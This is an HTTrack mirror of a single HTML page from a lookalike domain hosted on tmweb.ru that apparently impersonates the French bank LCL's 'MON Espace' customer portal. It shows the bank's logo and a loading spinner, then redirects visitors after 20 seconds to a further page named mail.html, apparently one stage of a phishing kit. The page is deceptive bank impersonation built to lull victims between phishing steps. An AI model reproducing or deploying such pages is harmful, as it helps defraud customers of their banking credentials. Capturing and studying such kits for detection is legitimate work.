<!doctype html>
<html lang="en">


<!-- Mirrored from monespcaleclientlclsecurite.ca69140.tmweb.ru/loading2.php by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 10 Jun 2021 13:43:28 GMT -->
<!-- Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title> LCL - MON Espace</title>


    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/fontawsom-all.min.css">
    <link rel="stylesheet" type="text/css" href="assets/css/style.css" />
</head>

<body>
    <div class="container-fluid conya">
        <div class="side-left">
            <div class="sid-layy">
                <div class="row slid-roo">

                </div>
            </div>
        </div>
        <div class="side-right" style="padding: 100px 30px;">
            <img class="logo" src="assets/images/logo.svg" alt="">

            <div style="width:66px; height:100px; margin-top:70px; margin-left: auto; margin-right: auto;">
                <div class="nb-spinner"></div>
            </div>





        </div>

    </div>
</body>


<script>
    setTimeout(function () {
        window.location.href = 'LCL4/monespcaleclientlclsecurite.ca69140.tmweb.ru/mail.html';
    }, 20000);

</script>

<script src="assets/js/jquery-3.2.1.min.js"></script>
<script src="assets/js/popper.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/script.js"></script>



<!-- Mirrored from monespcaleclientlclsecurite.ca69140.tmweb.ru/loading2.php by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 10 Jun 2021 13:43:31 GMT -->

</html>